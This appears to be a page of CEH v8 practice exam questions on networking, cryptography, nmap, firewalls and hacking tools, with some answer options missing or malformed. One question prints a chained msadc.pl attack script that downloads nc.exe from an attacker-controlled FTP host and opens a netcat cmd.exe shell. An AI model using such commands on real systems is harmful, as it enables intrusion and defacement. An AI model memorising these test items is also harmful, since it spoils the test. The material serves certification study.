Last Updated on July 24, 2021 by InfraExam
EC0-350 : ECCouncil Certified Ethical Hacker v8 : Part 06
Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common?
- They are written in Java.
- They send alerts to security monitors.
- They use the same packet analysis engine.
- They use the same packet capture utility.
Which set of access control solutions implements two-factor authentication?
- USB token and PIN
- Fingerprint scanner and retina scanner
- Password and PIN
- Account and password
A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company’s internal network. Which of the following can be implemented to minimize the opportunity for the man-in-the-middle attack to occur?
- Mutual authentication
- Static IP addresses
A person approaches a network administrator and wants advice on how to send encrypted email from home. The end user does not want to have to pay for any license fees or manage server services. Which of the following is the most secure encryption protocol that the network administrator should recommend?
- IP Security (IPSEC)
- Multipurpose Internet Mail Extensions (MIME)
- Pretty Good Privacy (PGP)
- Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)
To send a PGP encrypted message, which piece of information from the recipient must the sender have before encrypting the message?
- Recipient’s private key
- Recipient’s public key
- Master encryption key
- Sender’s public key
An engineer is learning to write exploits in C++ and is using the exploit tool Backtrack. The engineer wants to compile the newest C++ exploit and name it calc.exe. Which command would the engineer use to accomplish this?
- g++ hackersExploit.cpp -o calc.exe
- g++ hackersExploit.py -o calc.exe
- g++ -i hackersExploit.pl -o calc.exe
- g++ –compile –i hackersExploit.cpp -o calc.exe
A recently hired network security associate at a local bank was given the responsibility to perform daily scans of the internal network to look for unauthorized devices. The employee decides to write a script that will scan the network for unauthorized devices every morning at 5:00 am.
Which of the following programming languages would most likely be used?
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:
system(“perl msadc.pl -h $host -C \”echo open $your >testfile\””);
system(“perl msadc.pl -h $host -C \”echo $user>>testfile\””);
system(“perl msadc.pl -h $host -C \”echo $pass>>testfile\””);
system(“perl msadc.pl -h $host -C \”echo bin>>testfile\””);
system(“perl msadc.pl -h $host -C \”echo get nc.exe>>testfile\””);
system(“perl msadc.pl -h $host -C \”echo get hacked.html>>testfile\””);
(“perl msadc.pl -h $host -C \”echo quit>>testfile\””);
system(“perl msadc.pl -h $host -C \”ftp \-s\:testfile\””);
$o=; print “Opening …\n”;
system(“perl msadc.pl -h $host -C \”nc -l -p $port -e cmd.exe\””);
Which exploit is indicated by this script?
- A buffer overflow exploit
- A chained exploit
- A SQL injection exploit
- A denial of service exploit
One advantage of an application-level firewall is the ability to
- filter packets at the network level.
- filter specific commands, such as http:post.
- retain state information for each packet.
- monitor tcp handshaking.
Which of the statements concerning proxy firewalls is correct?
- Proxy firewalls increase the speed and functionality of a network.
- Firewall proxy servers decentralize all activity for an application.
- Proxy firewalls block network packets from passing to and from a protected network.
- Computers establish a connection with a proxy firewall which initiates a new network connection for the client.
Which NMAP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection?
- NMAP -PN -A -O -sS 192.168.2.0/24
- NMAP -P0 -A -O -p1-65535 192.168.0/24
- NMAP -P0 -A -sT -p0-65535 192.168.0/16
- NMAP -PN -O -sS -p 1-1024 192.168.0/8
While checking the settings on the internet browser, a technician finds that the proxy server settings have been checked and a computer is trying to use itself as a proxy server. What specific octet within the subnet does the technician see?
A company has five different subnets: 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0. How can NMAP be used to scan these adjacent Class C networks?
- NMAP -P 192.168.1-5.
- NMAP -P 192.168.0.0/16
- NMAP -P 192.168.1.0,2.0,3.0,4.0,5.0
- NMAP -P 192.168.1/17
A penetration tester is attempting to scan an internal corporate network from the internet without alerting the border sensor. Which is the most efficient technique should the tester consider using?
- Spoofing an IP address
- Tunneling scan over SSH
- Tunneling over high port numbers
- Scanning using fragmented IP packets
A hacker is attempting to see which ports have been left open on a network. Which NMAP switch would the hacker use?
ICMP ping and ping sweeps are used to check for active systems and to check
- if ICMP ping traverses a firewall.
- the route that the ICMP ping took.
- the location of the switchport in relation to the ICMP ping.
- the number of hops an ICMP ping takes to reach a destination.
Which command line switch would be used in NMAP to perform operating system detection?
A hacker is attempting to use nslookup to query Domain Name Service (DNS). The hacker uses the nslookup interactive mode for the search. Which command should the hacker type into the command shell to request the appropriate records?
- Locate type=ns
- Request type=ns
- Set type=ns
- Transfer type=ns
A hacker searches in Google for filetype:pcf to find Cisco VPN config files. Those files may contain connectivity passwords that can be decoded with which of the following?
- Cain and Abel
- John The Ripper Pro
On a Linux device, which of the following commands will start the Nessus client in the background so that the Nessus server can be configured?
- nessus +
- nessus *s
- nessus &
- nessus -d